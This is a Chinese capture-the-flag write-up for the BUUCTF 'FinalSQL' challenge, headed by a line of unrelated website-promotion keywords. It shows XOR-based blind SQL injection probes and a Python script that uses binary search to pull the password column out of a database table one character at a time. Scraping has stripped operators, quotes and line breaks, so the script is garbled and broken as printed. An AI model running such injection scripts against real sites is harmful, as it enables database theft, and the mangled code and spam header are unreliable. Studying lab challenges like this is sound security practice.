网站推广费用ihanshi,天河建设网站开发,接网站 建设,网站如何更新打开题目 点击1到5号的结果
1号 2号 3号 4号 5号 这里直接令传入的id6 传入id1^1^1 逻辑符号|会被检测到#xff0c;而感觉成了注释符#xff0c;之后的内容都被替换掉了。
传入id1|1
直接盲注比较慢#xff0c;还需要利用二分法来编写脚本
这里利用到大佬的脚…打开题目 点击1到5号的结果
1号 2号 3号 4号 5号 这里直接令传入的id6 传入id1^1^1 逻辑符号|会被检测到而感觉成了注释符之后的内容都被替换掉了。
传入id1|1
直接盲注比较慢还需要利用二分法来编写脚本
这里利用到大佬的脚本
import requestsurl http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php
flag def payload(i, j):sql 1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))%d)^1 % (i, j)data {id: sql}r requests.get(url, paramsdata)# print (r.url)if Click in r.text:res 1else:res 0return resdef exp():global flagfor i in range(1, 10000):print(i, :)low 31high 127while low high:mid (low high) // 2res payload(i, mid)if res:low mid 1else:high mid - 1f int((low high 1)) // 2if (f 127 or f 31):break# print (f)flag chr(f)print(flag)exp()
print(flag, flag)
运行一下得到flag 得到flag 参考文章
[极客大挑战 2019]FinalSQL 1-CSDN博客
https://www.cnblogs.com/Article-kelp/p/14651000.html
